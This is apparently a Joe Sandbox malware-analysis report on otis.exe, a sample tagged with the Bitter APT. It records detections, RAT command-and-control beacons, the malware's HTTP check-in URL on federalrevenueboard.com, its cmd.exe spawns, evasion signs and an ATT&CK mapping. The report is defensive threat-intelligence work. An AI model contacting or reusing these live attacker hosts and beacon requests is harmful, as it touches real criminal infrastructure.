Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
otis.exe

Overview

General Information

Sample name:otis.exe
Analysis ID:1554908
MD5:3d922c89c5f0f8f9a738bec3a24d0494
SHA1:d5b0ad895d5adbf919ed6771292410df924fdd00
SHA256:cb7e6640ab5c1dad5083e5790d6009c317894406b970d42a34758e99a9ff7f94
Tags:aptBitterexeuser-smica83
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • otis.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\otis.exe" MD5: 3D922C89C5F0F8F9A738BEC3A24D0494)
    • cmd.exe (PID: 7084 cmdline: "cmd.exe" /k echo smyytbFVD4:936905/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2084 cmdline: "cmd.exe" /k echo smyytbFVD4:936905/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6104 cmdline: "cmd.exe" /k echo smyytbFVD4:936905/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2164 cmdline: "cmd.exe" /k echo smyytbFVD4:936905/user MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-13T08:12:05.952078+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449730TCP
2024-11-13T08:12:26.366708+010020229301A Network Trojan was detected20.109.210.53443192.168.2.455175TCP
2024-11-13T08:12:27.632430+010020229301A Network Trojan was detected20.109.210.53443192.168.2.455176TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-13T08:13:57.604442+010028033053Unknown Traffic192.168.2.45544291.132.92.2319314TCP
2024-11-13T08:14:20.129952+010028033053Unknown Traffic192.168.2.45544491.132.92.2319314TCP
2024-11-13T08:14:42.862830+010028033053Unknown Traffic192.168.2.45544691.132.92.2319314TCP
2024-11-13T08:14:51.480932+010028033053Unknown Traffic192.168.2.45544891.132.92.2319314TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-13T08:12:24.170628+010028111761Malware Command and Control Activity Detected192.168.2.455174162.252.175.1316969TCP
2024-11-13T08:14:02.666863+010028111761Malware Command and Control Activity Detected192.168.2.455443162.252.175.1316969TCP
2024-11-13T08:14:25.197740+010028111761Malware Command and Control Activity Detected192.168.2.455445162.252.175.1316969TCP
2024-11-13T08:14:48.185402+010028111761Malware Command and Control Activity Detected192.168.2.455447162.252.175.1316969TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: otis.exeReversingLabs: Detection: 42%
Source: otis.exeVirustotal: Detection: 52%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.5% probability
Source: otis.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:55174 -> 162.252.175.131:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:55445 -> 162.252.175.131:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:55443 -> 162.252.175.131:6969
Source: Network trafficSuricata IDS: 2811176 - Severity 1 - ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound : 192.168.2.4:55447 -> 162.252.175.131:6969
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 55442 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55442
Source: unknownNetwork traffic detected: HTTP traffic on port 55444 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55444
Source: unknownNetwork traffic detected: HTTP traffic on port 55446 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55446
Source: unknownNetwork traffic detected: HTTP traffic on port 55448 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55448
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 91.132.92.231:9314
Source: global trafficTCP traffic: 192.168.2.4:55174 -> 162.252.175.131:6969
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55442 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55446 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55444 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:55448 -> 91.132.92.231:9314
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:55176
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:55175
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownTCP traffic detected without corresponding DNS query: 162.252.175.131
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficHTTP traffic detected: GET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1Host: federalrevenueboard.com:9314
Source: global trafficDNS traffic detected: DNS query: federalrevenueboard.com
Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: otis.exe, 00000000.00000002.3495540101.0000027247BC5000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247B1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com
Source: otis.exe, 00000000.00000002.3495540101.0000027247AFD000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247BC5000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314
Source: otis.exe, 00000000.00000002.3495540101.0000027247B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5
Source: otis.exe, 00000000.00000002.3495540101.0000027247A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5P
Source: otis.exe, 00000000.00000002.3495540101.0000027247BC5000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5h
Source: otis.exe, 00000000.00000002.3495540101.0000027247AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://federalrevenueboard.com:93142y
Source: otis.exe, 00000000.00000002.3495540101.0000027247AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B893BFD0_2_00007FFD9B893BFD
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B8932680_2_00007FFD9B893268
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B8830780_2_00007FFD9B883078
Source: classification engineClassification label: mal64.troj.winEXE@13/0@3/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Users\user\Desktop\otis.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03
Source: otis.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: otis.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\otis.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: otis.exeReversingLabs: Detection: 42%
Source: otis.exeVirustotal: Detection: 52%
Source: unknownProcess created: C:\Users\user\Desktop\otis.exe "C:\Users\user\Desktop\otis.exe"
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/user
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\otis.exeSection loaded: sspicli.dllJump to behavior
Source: otis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: otis.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: otis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: otis.exeStatic PE information: 0xB658ECE9 [Sat Dec 11 08:18:49 2066 UTC]
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B896810 pushad ; retf 0_2_00007FFD9B89682D
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B896840 pushad ; retf 0_2_00007FFD9B89682D
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B895F98 push ebx; retn 0017h0_2_00007FFD9B895F7A
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B89677D pushad ; retf 0_2_00007FFD9B89682D
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B895FB3 push ebx; ret 0_2_00007FFD9B895FCA
Source: C:\Users\user\Desktop\otis.exeCode function: 0_2_00007FFD9B895EAA push ebx; retn 0017h0_2_00007FFD9B895F7A

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 55442 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55442
Source: unknownNetwork traffic detected: HTTP traffic on port 55444 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55444
Source: unknownNetwork traffic detected: HTTP traffic on port 55446 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55446
Source: unknownNetwork traffic detected: HTTP traffic on port 55448 -> 9314
Source: unknownNetwork traffic detected: HTTP traffic on port 9314 -> 55448
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\otis.exeMemory allocated: 27245FD0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\otis.exeMemory allocated: 2725FA70000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\otis.exeWindow / User API: threadDelayed 3962Jump to behavior
Source: C:\Users\user\Desktop\otis.exeWindow / User API: threadDelayed 2310Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 6804Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 6804Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 7156Thread sleep count: 3962 > 30Jump to behavior
Source: C:\Users\user\Desktop\otis.exe TID: 7156Thread sleep count: 2310 > 30Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\otis.exeThread delayed: delay time: 100000Jump to behavior
Source: otis.exe, 00000000.00000002.3495086981.0000027245EDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
Source: C:\Users\user\Desktop\otis.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\otis.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /k echo smyytbFVD4:936905/userJump to behavior
Source: C:\Users\user\Desktop\otis.exeQueries volume information: C:\Users\user\Desktop\otis.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\otis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\otis.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\otis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media11
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsInternet Connection DiscoverySSHKeylogging2
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
